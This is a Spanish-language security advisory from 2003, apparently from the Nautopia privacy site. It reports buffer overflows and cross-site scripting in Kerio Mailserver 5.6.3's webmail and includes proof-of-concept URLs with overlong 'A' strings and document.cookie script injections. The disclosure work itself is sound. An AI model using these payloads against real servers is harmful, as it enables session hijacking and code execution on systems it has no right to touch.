Logo de NAUTOPIA y de la Comunidad Nautópata    NAUTOPIA: Privacidad, Seguridad y Libertades Civiles    Foro Local de TARRACO, Tarragona

  

ANILLO     CONTACTAR    CULTURALIA     DOWNLOADS    KIOSKO    FORO         HOME
 

                              Translate 
 

 

 

Múltiples desbordamientos de buffer

y cross site scripting en Kerio Mailserver

 

Asunto

Multiples desbordamientos de buffer y cross site scripting en Kerio Mailserver

Fecha

18-5-03

Versiones afectadas

  • 5.6.3 (última en el kerio website)

Estatus del vendedor

El vendedor ha sido informado

 

Descripción

Kerio mailserver es un servidor de correo que soporta los protocolos imap, pop3 y smtp. Además instala un webmail en el puerto 80.

Hay múltiples vulnerabilidades en este webmail que permitirían a un intruso con cuenta en el webmail secuestrar la sesión del usuario o ejecutar código en el sistema con privilegios de system.

Módulo do_subscribe

Un nombre de usuario largo provoca una total corrupción de la pila y que se sobreescriba el puntero de instrucción EIP
de un thread del programa

http://[server]/do_subscribe?showuser=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAA

Debido a que los tres primeros bytes de EIP son sobreescritos se puede ejecutar código con privilegios de system.

Módulo add_acl

Debido a un insuficiente filtrado de los caracteres contenidos por las variables de la petición HTTP cuyo contenido aparece por pantalla, se puede inyectar un script en el contexto de la página

http://[server]/add_acl?folder=~conde0@localhost/INBOX&add_name=<script>alert(document.cookie);

</script>

Si además situamos como folder ~admin@localhost/INBOX, el servidor se parará la pulsar en el enlace.

Además, el mismo desbordamiento de buffer se produce al utilizar un nombre de usuario largo, señal de que es la misma función la que produce el fallo

http://[server]/add_acl?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

@localhost/INBOX&add_name=lucas

Módulo list

El mismo desbordamiento de buffer

http://[Server]/list?folder=~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

@localhost/INBOX

Módulo do_map

Debido a insuficiente filtrado de los caracteres contenidos por las variables de la petición HTTP cuyo contenido aparece por pantalla
hace que se puede inyectar un script en el contexto de la página

http://[Server]/do_map?action=new&oldalias=eso&alias=<script>alert(document.cookie);

</script>&folder=public&user=tro

También se produce el mismo desbordamiento

http://[Server]/do_map?action=new&oldalias=eso&alias=aaa&folder=public&user=AAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAA

 

Debido a la posibilidad de incluir el exploit en la URL, un intruso que no tenga acceso al webmail puede contruir un enlace con el código a ejecutar esperando que sea pulsado por alguien que tenga abierta una sesión en un Kerio mailserver.

 

 

Créditos

Esta vulnerabilidad fue descubierta por David F. Madrid, redactor de Nautopía.

 

 

-Vulnerabilidades-

 
 

 
 
 

NAUTOPIA © 2003. Reservados todos los derechos.